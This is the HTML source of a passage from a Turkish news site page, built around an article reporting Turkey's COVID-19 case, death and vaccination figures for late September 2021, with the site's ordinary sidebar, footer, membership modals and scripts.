        <a href="https://facebook.com/Habersondakikaa/" class="pull-right hs-sdch" target="_blank" rel="nofollow">Beğen</a>
      </div>
                  <div class="hs-social-block hs-twitter">
          <i class="fa fa-twitter"></i><a href="https://twitter.com/kamusaaticom" class="hs-sdch" target="_blank" rel="nofollow"><strong class="hs-twitter-count">3.5B</strong> TAKİPÇİ</a>
          <a href="https://twitter.com/kamusaaticom" class="pull-right hs-sdch" target="_blank" rel="nofollow">Takip Et</a>
      </div>
                  <div class="hs-social-block hs-google-plus">
          <i class="fa fa-google-plus"></i><a href="https://www.instagram.com/kamusaati.com.tr/" class="hs-sdch" target="_blank" rel="nofollow"><strong class="hs-google-plus-count"></strong> TAKİPÇİ</a>
          <a href="https://www.instagram.com/kamusaati.com.tr/" class="pull-right hs-sdch" target="_blank" rel="nofollow">Takip Et</a>
      </div>
                  <div class="hs-social-block hs-youtube">
          <i class="fa fa-youtube"></i><a href="https://www.youtube.com/channel/UCcDbuYItq1cY_1ITKBAv5Jg" class="hs-sdch" target="_blank" rel="nofollow"><strong class="hs-youtube-count"></strong> ABONE</a>
          <a href="https://www.youtube.com/channel/UCcDbuYItq1cY_1ITKBAv5Jg" class="pull-right hs-sdch" target="_blank" rel="nofollow">Abone Ol</a>
      </div>
      		</div>
	</div>
<!--Sosyal Ağlar-->
<!--Alıntı Yazarlar-->
  <!--Alıntı Yazarlar-->
<!--Anketler-->
<!--Anketler-->
<!--Hava Durumu-->
<!--Hava Durumu-->
<!--Namaz Vakitleri-->
<!--Namaz Vakitleri-->
<!--Lig Puan Tablosu-->
<!--Lig Puan Tablosu-->
<!--Para Piyasası-->
		<!--Para Piyasası-->
<!--Son Yorumlar-->
<div class="panel panel-default panel-aqua panel-sonyorumlar">
	<div class="panel-heading">
		<div class="caption">
			<i class="fa fa-comments fa-fw"></i>
			<b>Son</b> Yorumlar		</div>
	</div>
	<div class="panel-body">
		<div class="news-list">
			<ul class="list-group">
				   					<li class="list-group-item">
						<a href="https://www.kamusaati.com/personel-alimi/ankara-sehir-hastanesi-personel-alimi-is-basvurusu-h37177.html#comment_30968" target="_blank">Ankara Keçiören İncirli de oturuyorum...</a>
					</li>
										<li class="list-group-item">
						<a href="https://www.kamusaati.com/personel-alimi/sanliurfa-buyuksehir-belediyesi-personel-alimi-is-basvurusu-nereden-nasil-yapilir-basvuru-formu-h36043.html#comment_30967" target="_blank">7 aydır işsizim sizden ricam bana göre...</a>
					</li>
										<li class="list-group-item">
						<a href="https://www.kamusaati.com/personel-alimi/sanliurfa-buyuksehir-belediyesi-personel-alimi-is-basvurusu-nereden-nasil-yapilir-basvuru-formu-h36043.html#comment_30966" target="_blank">7 aydır işsizim sizden ricam bana göre...</a>
					</li>
										<li class="list-group-item">
						<a href="https://www.kamusaati.com/personel-alimi/izmir-buca-belediyesi-isci-personel-alimi-yapacak-is-basvurusu-ve-basvuru-formu-h41539.html#comment_30965" target="_blank">Ankaradan izmire pandemi şartlarından...</a>
					</li>
										<li class="list-group-item">
						<a href="https://www.kamusaati.com/personel-alimi/catalca-belediyesi-personel-alimi-is-basvurusu-h37025.html#comment_30964" target="_blank">benim ise ihtiyacım var yar dlmcl ollsanlz...</a>
					</li>
									</ul>
			</div>
		</div>
</div>
<!--Son Yorumlar-->
<!--Karikatür-->
<!--Karikatür-->
<!--E-gazete-->
 <!--E-gazete-->
<!--Sayfalar-->
<!--Sayfalar-->
<!--Arşiv-->
<div class="panel panel-default panel-bittersweet panel-arsiv">
	<div class="panel-heading">
		<div class="caption">
			<i class="fa fa-university fa-fw"></i>
			<b>Arşiv</b>		</div>
	</div>
	<div class="panel-body arsiv">
		<form action="https://www.kamusaati.com/?m=arsiv" class="form-inline" method="post" name="arsiv" >
			<select name="gun" class="day form-control">
									<option value="01" >01</option>
									<option value="02" >02</option>
									<option value="03" >03</option>
									<option value="04" >04</option>
									<option value="05" >05</option>
									<option value="06" >06</option>
									<option value="07" >07</option>
									<option value="08" >08</option>
									<option value="09" >09</option>
									<option value="10" >10</option>
									<option value="11" >11</option>
									<option value="12" >12</option>
									<option value="13" >13</option>
									<option value="14" >14</option>
									<option value="15" >15</option>
									<option value="16" >16</option>
									<option value="17" >17</option>
									<option value="18" >18</option>
									<option value="19" >19</option>
									<option value="20" >20</option>
									<option value="21" >21</option>
									<option value="22" >22</option>
									<option value="23" >23</option>
									<option value="24" >24</option>
									<option value="25" >25</option>
									<option value="26" >26</option>
									<option value="27" >27</option>
									<option value="28" selected>28</option>
									<option value="29" >29</option>
									<option value="30" >30</option>
									<option value="31" >31</option>
							</select>
			<select name="ay" class="month form-control">
									<option value="01" >Ocak</option>
									<option value="02" >Şubat</option>
									<option value="03" >Mart</option>
									<option value="04" >Nisan</option>
									<option value="05" >Mayıs</option>
									<option value="06" >Haziran</option>
									<option value="07" >Temmuz</option>
									<option value="08" >Ağustos</option>
									<option value="09" selected>Eylül</option>
									<option value="10" >Ekim</option>
									<option value="11" >Kasım</option>
									<option value="12" >Aralık</option>
							</select>
			<select name="yil" class="year form-control">
									<option value="2021" selected>2021</option>
									<option value="2020" >2020</option>
									<option value="2019" >2019</option>
									<option value="2018" >2018</option>
									<option value="2017" >2017</option>
							</select>
			<button type="submit" class="btn btn-danger pull-right">
				Ara			</button>
		</form>
	</div>
</div>
<!--Arşiv-->
</aside>
          </div>                    <div class="reklam dikey sol hidden-xs hidden-sm" style="width:300px;height:1050px;top:80px!important;">

                                        <p style="width:300px;"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- sol dikey geniş -->
<ins class="adsbygoogle"
 style="display:inline-block;width:300px;height:1050px"
 data-ad-client="ca-pub-6097435963991227"
 data-ad-slot="3680826574"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script></p>                                                                                                                                                                  </div>
                    <div class="reklam dikey sag hidden-xs hidden-sm" style="width:px;height:px;top:80px!important;">

                                                                
              
                                                                                                                                                                                                        </div>
        </main>


        <!-- yukarı çık icon // -->
<a href="javascript:void(0);" data-scroll="0" class="go-upstairs visible-lg"><i class="fa fa-arrow-circle-o-up"></i></a>
<!-- // yukarı çık icon -->
<!-- Footer // -->
<footer>
  <div class="footer-top">
    <div class="container center ">
      <ul class="nav navbar-nav navbar-left hidden-sm hidden-xs">
        <li>
          <a href="https://www.kamusaati.com/">
            <i class="fa fa-home fa-fw"></i>
            <span class="">Anasayfa</span>
          </a>
        </li>
                                <li>
          <a href="https://www.kamusaati.com/yazarlar/" target="_blank">
            <i class="fa fa-users fa-fw"></i>
            <span class="">Yazarlar</span>
          </a>
        </li>
                        <li>
          <a href="https://www.kamusaati.com/sitene-ekle.html" target="_blank">
            <i class="fa fa-code fa-fw"></i>
            <span class="">Sitene Ekle</span>
          </a>
        </li>
        <li>
          <a href="https://www.kamusaati.com/kunye.html" target="_blank">
            <i class="fa fa-info-circle fa-fw"></i>
            <span class="">Künye</span>
          </a>
        </li>
        <li>
          <a href="https://www.kamusaati.com/iletisim.html" target="_blank">
            <i class="fa fa-phone fa-fw"></i>
            <span class="">İletişim</span>
          </a>
        </li>
        <li class="pull-right text-right">
          <a href="javascript:void(0);" data-scroll="0">
            <i class="fa fa-arrow-up fa-fw"></i>
            <span class="">Yukarı Çık</span>
          </a>
        </li>
      </ul>
      <div class="text-center visible-sm visible-xs">
        <a href="javascript:void(0);" data-scroll="0">
          <i class="fa fa-arrow-up fa-fw"></i>
          Yukarı Çık          <i class="fa fa-arrow-up fa-fw"></i>
        </a>
      </div>
    </div>
  </div>
  <div class="footer-middle">
    <div class="container center ">
      <div class="col-md-3 col-sm-12">
        <a href="https://www.kamusaati.com/">
          <img src="https://www.kamusaati.com/images/banner/ks-alt-logo.png" alt="Kamu Haber Memurlar İşçi Memur Personel Alımı İş İlanları Kamusaati" class="img-responsive">
        </a>
        <span class="summary">
          Kamu Haber Saati        </span>
      </div>
      <!-- footer kategorileri // -->
      <div class="col-md-5 col-sm-6">
         <ul class="col-sm-4 visible-xs clearfix">
            <li><a href="https://www.kamusaati.com/resmi-gazete" target="_blank"><i class="fa fa-tag fa-fw"></i> Resmi...</a></li>		
		<li><a href="https://www.kamusaati.com/ogretmenler-ve-meb-personelleri" target="_blank"><i class="fa fa-tag fa-fw"></i> Öğretmenler...</a></li>		
		<li><a href="https://www.kamusaati.com/teog-haberleri" target="_blank"><i class="fa fa-tag fa-fw"></i> TEOG...</a></li>		
		<li><a href="https://www.kamusaati.com/gundem" target="_blank"><i class="fa fa-tag fa-fw"></i> Gündem</a></li>		
		<li><a href="https://www.kamusaati.com/kose-yazisi" target="_blank"><i class="fa fa-tag fa-fw"></i> Köşe...</a></li>		
		<li><a href="https://www.kamusaati.com/personel-alimi" target="_blank"><i class="fa fa-tag fa-fw"></i> Personel...</a></li>		
		<li><a href="https://www.kamusaati.com/memurlar" target="_blank"><i class="fa fa-tag fa-fw"></i> Memurlar</a></li>		
		<li><a href="https://www.kamusaati.com/egitim-haberleri" target="_blank"><i class="fa fa-tag fa-fw"></i> Eğitim...</a></li>		
		<li><a href="https://www.kamusaati.com/atama-haberleri" target="_blank"><i class="fa fa-tag fa-fw"></i> Atama...</a></li>		
		<li><a href="https://www.kamusaati.com/sinav-haberleri" target="_blank"><i class="fa fa-tag fa-fw"></i> Sınav...</a></li>		
		<li><a href="https://www.kamusaati.com/secim-haberleri" target="_blank"><i class="fa fa-tag fa-fw"></i> Seçim...</a></li>		
		<li><a href="https://www.kamusaati.com/ogretmen-atamalari" target="_blank"><i class="fa fa-tag fa-fw"></i> Öğretmen...</a></li>		
		<li><a href="https://www.kamusaati.com/saglik-personelleri" target="_blank"><i class="fa fa-tag fa-fw"></i> Sağlık...</a></li>		
		<li><a href="https://www.kamusaati.com/akademik-personel-haberleri" target="_blank"><i class="fa fa-tag fa-fw"></i> Akademik...</a></li>		
		<li><a href="https://www.kamusaati.com/emekli-haberleri" target="_blank"><i class="fa fa-tag fa-fw"></i> Emekli...</a></li>		
		          </ul>
        <div class="row hidden-xs">
          <ul class="col-sm-4 clearfix">
            <li><a href="https://www.kamusaati.com/resmi-gazete" target="_blank"><i class="fa fa-tag fa-fw"></i> Resmi...</a></li>		
		<li><a href="https://www.kamusaati.com/ogretmenler-ve-meb-personelleri" target="_blank"><i class="fa fa-tag fa-fw"></i> Öğretmenler...</a></li>		
		<li><a href="https://www.kamusaati.com/teog-haberleri" target="_blank"><i class="fa fa-tag fa-fw"></i> TEOG...</a></li>		
		<li><a href="https://www.kamusaati.com/gundem" target="_blank"><i class="fa fa-tag fa-fw"></i> Gündem</a></li>		
		<li><a href="https://www.kamusaati.com/kose-yazisi" target="_blank"><i class="fa fa-tag fa-fw"></i> Köşe...</a></li>		
		          </ul>
          <ul class="col-sm-4 clearfix">
            <li><a href="https://www.kamusaati.com/personel-alimi" target="_blank"><i class="fa fa-tag fa-fw"></i> Personel...</a></li>		
		<li><a href="https://www.kamusaati.com/memurlar" target="_blank"><i class="fa fa-tag fa-fw"></i> Memurlar</a></li>		
		<li><a href="https://www.kamusaati.com/egitim-haberleri" target="_blank"><i class="fa fa-tag fa-fw"></i> Eğitim...</a></li>		
		<li><a href="https://www.kamusaati.com/atama-haberleri" target="_blank"><i class="fa fa-tag fa-fw"></i> Atama...</a></li>		
		<li><a href="https://www.kamusaati.com/sinav-haberleri" target="_blank"><i class="fa fa-tag fa-fw"></i> Sınav...</a></li>		
		          </ul>
          <ul class="col-sm-4 clearfix">
            <li><a href="https://www.kamusaati.com/secim-haberleri" target="_blank"><i class="fa fa-tag fa-fw"></i> Seçim...</a></li>		
		<li><a href="https://www.kamusaati.com/ogretmen-atamalari" target="_blank"><i class="fa fa-tag fa-fw"></i> Öğretmen...</a></li>		
		<li><a href="https://www.kamusaati.com/saglik-personelleri" target="_blank"><i class="fa fa-tag fa-fw"></i> Sağlık...</a></li>		
		<li><a href="https://www.kamusaati.com/akademik-personel-haberleri" target="_blank"><i class="fa fa-tag fa-fw"></i> Akademik...</a></li>		
		<li><a href="https://www.kamusaati.com/emekli-haberleri" target="_blank"><i class="fa fa-tag fa-fw"></i> Emekli...</a></li>		
		          </ul>
        </div>
      </div>
      <!-- // footer kategorileri -->
      <div class="col-md-4 col-sm-6">
        <address>
          <b>Kamu Saati <br></b>
          <a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="adc3dec9c89f9d9d99edc5c2d9c0ccc4c183cec2c0">[email&#160;protected]</a> <br><br>                          <b>İletişim</b><br>
               <abbr title="Telefon">Telefon:</abbr> WHATS APP İHBAR HATTI : 0552 744 2838<br>                <abbr title="Mail">Mail:</abbr> <a href="/cdn-cgi/l/email-protection#157b66717027252521557d7a6178747c793b767a78"><span class="__cf_email__" data-cfemail="86e8f5e2e3b4b6b6b2c6eee9f2ebe7efeaa8e5e9eb">[email&#160;protected]</span></a>                </address>
                <!-- Sosyal Ağlar // -->
                <span class="social-media">
                  <a href="https://facebook.com/Habersondakikaa/" target="_blank" class="background-fb"><i class="fa fa-facebook"></i></a>
                  <a href="https://twitter.com/kamusaaticom" target="_blank" class="background-tw"><i class="fa fa-twitter"></i></a>
                  <a href="https://plus.google.com/107656870369728966642/posts" target="_blank" class="background-gp"><i class="fa fa-google-plus"></i></a>
                  <a href="https://www.kamusaati.com/rss.php" target="_blank" class="background-rs"><i class="fa fa-rss"></i></a>
                </span>
                <!-- // Sosyal Ağlar -->
              </div>
            </div>
          </div>
          <div class="footer-bottom">
            <div class="container text-center center ">
              <span class="summary copyright">
                Kamu Saati © 2021 - Bu sitede yayınlanan tüm materyalin her hakkı saklıdır. Yazıların tamamı alıntılanamaz. Bir kısmı alıntı yapılan yazılara aktif link vermek zorunludur.                </span>
                <p class="links">Yazılım: TE Bilişim</p>              </div>
            </div>
            <!--script dosyalarını çağır // -->
              <script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script type="text/javascript">
  function reloadCaptcha(){
    document.getElementById('captcha').src = document.getElementById('captcha').src+ '?' +new Date();
  }
  function kontrol_ref(){
    document.getElementById('modal_kontrol').src = document.getElementById('modal_kontrol').src+ '?' +new Date();
  }
  function modal_pass() {
  $("#unuttum_modal").validate({
    rules: {
      email: {
        required: true,
        email: true
      },
      spamq:"required"
    },
    messages: {
      email: {
        required: "&nbsp;E-posta adresi girin.",
        email: "&nbsp;Geçerli bir e-posta adresi girin."
      },
      spamq:"&nbsp;Güvenlik kodunu giriniz"
    },

    submitHandler: function() {

      $("#yukleniyor").css( {display:"block"});

      var keyword = $('#unuttum_modal').serialize();
      $.ajax({
        type: "POST",
        url: site_url+ajax_url+"unuttum.php",
        data: keyword,
        success: function(msg) {
          $("#yukleniyor").hide();
          if(msg=='kod_yanlis') {
            alert('Güvenlik kodunu doğru girdiğinizden emin olunuz!');
          } else if (msg=='uye_yok') {
            alert('E-Posta yanlış!');
          } else {
            $("#unuttum_modal").slideUp("fast", function() {
              $("#tebrik_unuttum").css( {display:"block"})
            });
          }
        }
      });
    },
    success: "valid"
  });
}
  function uyelik_modal() {
    $("#uyeolform_modal").validate({
      rules: {
        adsoyad: "required",
        email: {
          required: true,
          email: true,
          remote: site_url+ajax_url+"uyelik_islem.php?islem=mailkontrol"
        },
        user: {
          required: true,
          minlength: 3,
          remote: site_url+ajax_url+"uyelik_islem.php?islem=kontrol"
        },
        pass: {
          required: true,
          minlength: 3
        },
        cins: "required",
        spamq: "required"
      },

      messages: {
        adsoyad: "&nbsp;Ad ve Soyad giriniz.",
        email: {
          required: "&nbsp;E-posta adresi girin.",
          email: "&nbsp;Geçerli bir e-posta adresi girin.",
          remote: jQuery.format("&nbsp;{0} kullanılmakta.")
        },
        user: {
          required: "&nbsp;Kullanıcı adı belirleyiniz.",
          minlength: jQuery.format("&nbsp;{0} karakter."),
          remote: jQuery.format("&nbsp;{0} kullanılmakta.")
        },
        pass: {
          required: "&nbsp;Şifre giriniz",
          minlength: jQuery.format("&nbsp;{0} karakter.")
        },
        cins: "&nbsp;Lütfen cinsiyet seçiniz.",
        spamq: "&nbsp;Güvenlik kodunu giriniz"
      },

      submitHandler: function() {
        var keyword = $('#uyeolform_modal').serialize();
        $.ajax({
          type: "POST",
          url: site_url+ajax_url+"uyelik_islem.php?islem=kaydol",
          data: keyword,
          success: function(msg) {
            if(msg=='kod_yanlis') {
              alert('Güvenlik kodunu doğru girdiğinizden emin olunuz!');
            } else {
              $("#yukleniyor").css( {display:"block"});
              $("#uyeolform_modal").slideUp("slow");

              $("#yukleniyor").hide();
              $("#uyeolform_modal").slideUp("fast", function() {
                $("#tesekkur_modal").css( {display:"block"});
                $("#uyeolform_modal").css( {display:"none"});
              });
            }
          }
        });
      },
      success: "valid"
    });

  }
  </script>
    <div class="modal fade" id="giris-yap">
    <div class="modal-dialog modal-sm">
      <div class="modal-content">
        <div class="modal-header">
          <button type="button" class="close" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">&times;</span></button>
          <div class="modal-title text-center strong-bold"><b>Üye</b> Girişi</div>
        </div>
        <div class="modal-body">
          <form action="https://www.kamusaati.com/index.php?m=login&amp;rd=https%3A%2F%2Fwww.kamusaati.com%2Fgundem%2F29-eylul-carsamba-koronavirus-tablosu-virus-vaka-sayisi-kac-vaka-sayisi-artti-mi-olum-sayisi-kac-oldu-h48574.html" method="post">
            <div class="form-group">
              <label for="inputName">Kullanıcı Adı</label>
              <input type="text" class="form-control" id="inputName" name="kullanici" placeholder="Kullanıcı Adınız..." required>
            </div>
            <div class="form-group">
              <label for="inputPassword">Parola</label>
              <input type="password" class="form-control" id="inputPassword" name="sifre" placeholder="Parolanız..." required>
            </div>
            <div class="form-group">
                              <button type="submit" class="btn btn-success btn-icon-right btn-sm pull-right">
                  Giriş                  <i class="fa fa-sign-in"></i>
                </button>
              </div>
              <div class="clearfix"></div>
            </form>
          </div>
          <div class="modal-footer">
            <a href="https://www.kamusaati.com/unuttum.html" class="btn btn-warning btn-icon-left btn-sm pull-left">
              <i class="fa fa-key"></i>
              Şifremi Unuttum?            </a>
            <a href="https://www.kamusaati.com/uyelik.html" class="btn btn-info btn-icon-right btn-sm pull-right">
              Üye Ol              <i class="fa fa-user-plus"></i>
            </a>
          </div>
        </div>
      </div>
    </div>

    <div class="modal fade" id="kayit-ol">
      <div class="modal-dialog modal-sm">
        <div class="modal-content">
          <div class="modal-header">
            <button type="button" class="close" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">&times;</span></button>
            <div class="modal-title text-center strong-bold"><b>Üyelik</b> Formu</div>
          </div>
          <div class="modal-body">
            <div id="tesekkur_modal" class="alert alert-success" style="display:none;">
    <button type="button" class="close" data-dismiss="alert">×</button>
      <strong>Tebrikler!</strong> Üyeliğiniz başarılı bir şekilde oluşturulmuştur.  </div>
          <form id="uyeolform_modal" name="uyeolform_modal">
              <div class="form-group">
                <label>Kullanıcı Adı</label>
                <input class="form-control" name="user" id="user" type="text" placeholder="Kullanıcı Adı" required>
              </div>
              <div class="form-group">
                <label>Parola</label>
              <input class="form-control" name="pass" id="pass" type="password" placeholder="Parola" required>
              </div>
              <div class="form-group">
                <label>Ad Soyad</label>
                <input class="form-control" name="adsoyad" id="adsoyad" type="text" placeholder="Ad Soyad" required>
              </div>
              <div class="form-group">
                <label>E-posta Adresi</label>
                <input class="form-control" name="email" id="email" type="text" placeholder="E-posta Adresi" required>
              </div>
              <div class="form-group">
                <label>Cinsiyet</label>
                <select name="cins" id="cins" class="form-control">
                  <option value="">Seçiniz</option>
                  <option value="1">Kadın</option>
                  <option value="2">Erkek</option>
                </select>
              </div>
              <div class="form-group">
                <label>Doğrulama Kodu <img src="https://www.kamusaati.com/images/security_code.jpg" alt="Yenileyin" title="Yenileyin" id="captcha" onclick="javascript:reloadCaptcha()" /> = ?</label>
                <input name="spamq" type="text" maxlength="3" class="form-control" placeholder="Doğrulama Kodu" required>
              </div>
              <div class="form-group">
                                  <input type="hidden" name="token" value="fdb1ddaee3f832e81c486f96648da44fcc63fb6f" />
                  <button name="gonder" id="gonder" type="submit" class="btn btn-info btn-icon-right btn-sm pull-right" onclick="javascript:uyelik_modal();">
                    Üye Ol                    <i class="fa fa-user-plus"></i>
                  </button>
                </div>
                <div class="clearfix"></div>
              </form>
            </div>
            <div class="modal-footer">
              <a href="https://www.kamusaati.com/unuttum.html" class="btn btn-warning btn-icon-left btn-sm pull-left">
                <i class="fa fa-key"></i>
                Şifremi Unuttum?              </a>
              <a href="https://www.kamusaati.com/login.html" class="btn btn-success btn-icon-right btn-sm pull-right">
                Giriş                <i class="fa fa-sign-in"></i>
              </a>
            </div>
          </div>
        </div>
      </div>

      <div class="modal fade" id="forgot-pass">
      <div class="modal-dialog modal-sm">
        <div class="modal-content">
          <div class="modal-header">
            <button type="button" class="close" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">&times;</span></button>
            <div class="modal-title text-center strong-bold"><b>Şifremi</b> Unuttum?</div>
          </div>
          <div class="modal-body">
            <div id="tebrik_unuttum" class="alert alert-success" style="display:none;">
<button type="button" class="close" data-dismiss="alert">×</button>
<strong>Tebrikler!</strong> Yeni şifreniz kayıtlı e-posta adresine gönderilmiştir.<hr>
<a href="https://www.kamusaati.com/login.html" class="btn btn-success btn-icon-right">Giriş Yap <i class="fa fa-sign-in"></i></a>
</div>
            <form id="unuttum_modal" name="unuttum_modal" method="post">
              <div class="form-group">
                <label>E-posta Adresi</label>
              <input name="email" type="text" class="form-control" placeholder="E-posta Adresi" maxlength="50"/>
            </div>
              <div class="form-group">
                <label>Doğrulama Kodu <img src="https://www.kamusaati.com/images/security_code.jpg" alt="Yenileyin" title="Yenileyin" id="modal_kontrol" onclick="javascript:kontrol_ref()" /> = ?</label>
                <input name="spamq" type="text" maxlength="3" class="form-control" placeholder="Doğrulama Kodu" required>
              </div>
              <div class="form-group">
                  <input type="hidden" name="token" value="fdb1ddaee3f832e81c486f96648da44fcc63fb6f" /><button name="gonder" type="submit" class="btn btn-success btn-icon-left pull-right" onclick="javascript:modal_pass();"><i class="fa fa-send"></i> Gönder</button>
                </div>
                <div class="clearfix"></div>
              </form>
            </div>
          </div>
        </div>
      </div>
    



<script type="application/ld+json">
{
    "@context": "http://schema.org",
    "@type": "Organization",
    "url": "https://www.kamusaati.com/"
        ,"logo": {
        "@type": "ImageObject",
        "url": "https://www.kamusaati.com/images/banner/652.png",
        "width": 190,
        "height": 90    }
    

        ,"contactPoint": [
        {
            "@type": "ContactPoint",
            "telephone": "+90 WHATS APP İHBAR HATTI : 0552 744 2838",
            "contactType": "customer service"
        }
    ]
    }
</script>
<script type="application/ld+json">
{
    "@context": "http://schema.org",
    "@type": "WebSite",
    "url": "https://www.kamusaati.com/",
    "potentialAction": {
        "@type": "SearchAction",
        "target": "https://www.kamusaati.com/haberleri/{search_term_string}",
        "query-input": "required name=search_term_string"
    }
}
</script>

<script type="application/ld+json">
{
    "@context": "http://schema.org",
    "@type": "NewsArticle",
    "mainEntityOfPage": {
        "@type": "WebPage",
        "@id": "https://www.kamusaati.com/gundem/29-eylul-carsamba-koronavirus-tablosu-virus-vaka-sayisi-kac-vaka-sayisi-artti-mi-olum-sayisi-kac-oldu-h48574.html"
    },
    "headline": "29 Eylül Çarşamba Koronavirüs Tablosu, virüs vaka sayısı kaç?  vaka sayısı arttı mı ? ölüm sayısı kaç oldu?",
    "name": "29 Eylül Çarşamba Koronavirüs Tablosu, virüs vaka sayısı kaç?  vaka sayısı arttı mı ? ölüm sayısı kaç oldu?",
    "articleBody": "Sağlık Bakanlığı, son 24 saatte 239 kişinin korona virüsten hayatını kaybettiğini, 28 bin 892 yeni vakanın olduğunu açıkladı.Sağlık Bakanlığı tarafından Türkiye&#039;nin yeni korona virüs tablosu açıklandı 28 Eylül&#039;de açıklanan 24 saatlik verilere göre 28 bin 892 vaka tespit edildi. Virüs nedeniyle hayatını kaybedenlerin sayısı 239 oldu. Bir günde toplam 356 bin 661 test yapılırken, iyileşen hasta sayısı 30 bin 336 olarak kaydedildi. Sağlık Bakanlığı tarafından açıklanan tabloda,2 doz aşılama verilerine de yer verildi. En az 2 doz aşı olmuş 18 yaş üzeri nüfusu kapsayan verilere göre Türkiye&#039;de 2. doz aşılama ortalama yüzde 70,98 oldu. 1. doz ortalaması yüzde 86,45 olurken, 1., 2. ve 3. doz aşısını olan vatandaş sayısı toplamda 108 milyon 734 bin 111&#039;e yükseldi.2 doz aşılamada ilk sırada Kırklareli varVerilerde, aşılamada önde giden illere de yer verildi. Bakanlığın tablosuna göre yüzde 78,1 ile Türkiye&#039;de en çok aşılamanın gerçekleştirildiği Kırklareli&#039;yi Muğla, Amasya, Eskişehir Çanakkale, Ordu, Edirne, Balıkesir, Burdur ve Osmaniye takip etti.En düşük aşılama Şanlıurfa&#039;daBakanlığın tablosuna göre yüzde 45,0 ile Türkiye&#039;de en az aşılamanın gerçekleştirildiği Şanlıurfa&#039;yı sırasıyla Mardin, Batman, Bitlis, Muş, Diyarbakır, Siirt, Bingöl, Ağrı ve Şırnak takip etti.Sağlık Bakanı Fahrettin Koca, sosyal paylaşım sitesi Twitter hesabından yaptığı paylaşımda, &quot;‘Bu kadar insanın içinde gelip beni mi bulacak?&#039; Covid-19 toplam vaka sayısı, bugün 28 bin 892 yeni vakayla, 7 Milyon 95.580&#039;e yükseldi. Testleri pozitif çıkana kadar çoğu insan kendini riskten uzak görüyordu. Maske ve mesafe konusunda dikkatli olup, aşılarımızı mutlaka yaptıralım!” dedi.&amp;nbsp;",
    "articleSection": "Headlines",
    "description": "29 Eylül Çarşamba virüs vaka sayısı kaç? vaka sayısı arttı mı ? ölüm sayısı kaç oldu? pandemi covid-19 Korona virüs tablosu Türkiye Geneli son",
    "keywords": "",
    "image": {
        "@type": "ImageObject",
        "url": "",
        "width": 696,
        "height": 401    },
    "datePublished": "2021-09-28T18:30:27+03:00",
    "dateModified": "2021-09-28T20:30:36+03:00",
    "genre": "news",
    "wordCount": 355,
    "inLanguage": "tr-TR",
    "typicalAgeRange": "7-",
    "author": {
        "@type": "Person",
        "name": "Kamu Saati"
    }
        ,"publisher": {
        "@type": "Organization",
        "name": "Kamu Saati",
        "logo": {
            "@type": "ImageObject",
            "url": "https://www.kamusaati.com/images/banner/652.png",
            "width": 478,
            "height": 60
        }
    }
    
}
</script>

<!-- ==[Royal Theme Js]== -->
<script src="https://www.kamusaati.com/_themes/hs-royal/js/jquery-2.1.4.min.js"></script>
<script src="https://www.kamusaati.com/_themes/hs-royal/js/system.min.js"></script>
<script src="https://www.kamusaati.com/_themes/hs-royal/js/swipebox.min.js"></script>
<script src="https://www.kamusaati.com/_themes/hs-royal/js/jquery.cookie.min.js"></script>
<script src="https://www.kamusaati.com/_themes/hs-royal/js/comments.js"></script>
<script src="https://www.kamusaati.com/_themes/hs-royal/js/jquery.inf-scroll.js"></script>
<script>
		$('#haberler').cleverInfiniteScroll({
			contentsWrapperSelector: '#haberler',
			contentSelector: '.haber-kapsa',
			sidebarWrapperSelector: "aside",
			nextSelector: '#sonrakiHaber',
			loadImage: 'https://www.kamusaati.com/_themes/hs-royal/images/ajax-loader.gif'
		});
</script>
<script src="https://www.kamusaati.com/_themes/hs-royal/js/moment.min.js"></script>
<script src="https://www.kamusaati.com/_themes/hs-royal/js/moment-tr.min.js"></script>
<script src="https://www.kamusaati.com/_themes/hs-royal/js/jquery.pkisalt.min.js"></script>
<script src="https://www.kamusaati.com/_themes/hs-royal/js/login.min.js"></script>
<script src="https://www.kamusaati.com/_themes/hs-royal/js/jquery.validate.min.js"></script>
<script src="https://www.kamusaati.com/_themes/hs-royal/js/jquery.smartbanner.js"></script>
	<script src="https://www.kamusaati.com/_themes/hs-royal/js/jssocials.min.js"></script>
	<script type="text/javascript">
		var htitle = document.querySelectorAll(".haber-kapsa.active .caption h1")[0].innerHTML;
		var share = {
	    init: function() {

					$(".share").jsSocials({
							url: location.href,
							text: htitle,
							shareIn: "popup",
							showLabel: false,
							showCount: "inside",
							shares: ["twitter", "facebook", "googleplus", "linkedin", "pinterest", "whatsapp"]
					});
	    }

	}
	share.init();
	</script>
<!-- ==[Custom]== -->
<script src="https://www.kamusaati.com/_themes/hs-royal/js/custom.min.js"></script>
<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- metin reklam -->
<ins class="adsbygoogle"
 style="display:block"
 data-ad-client="ca-pub-6097435963991227"
 data-ad-slot="7337558062"
 data-ad-format="auto"
 data-full-width-responsive="true"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script><script type="text/javascript">
function writeCookie(c_name, value, timeout) {
    timeout = timeout * 60;
    var exdate = new Date();
    exdate.setTime(exdate.getTime()+(timeout * 1000));
    var c_value=escape(value) + ((timeout==null) ? "" : "; expires="+exdate.toGMTString());
    document.cookie = c_name + "=" + c_value;
}

readCookie = function (name) {
    var nameEQ = name + "=";
    var ca = document.cookie.split(';');
    for (var i = 0; i < ca.length; i++) {
        var c = ca[i];
        while (c.charAt(0) == ' ') c = c.substring(1, c.length);
        if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length, c.length);
    }
    return null;
};
$(document).ready(function () {
	var apptitle   = 'Kamu Saati';
    if (readCookie("smartBannerMobileCookie") == undefined) { $.smartbanner(
      {price: 'Ücretsiz',
      appStoreLanguage: 'tr',
      inAppStore: 'App Store\'da',
      inGooglePlay: 'Google Play\'de',
      button: 'Göster',
  	  title:apptitle}
    ); writeCookie("smartBannerMobileCookie", 1, 1); }
});
</script>
<script type="text/javascript">
/*
*/
$("#home_comments .comment-text").yKisalt();
	tebilisim('48574', 'haber', '');

function tebilisim(id, module, page, count_format) {
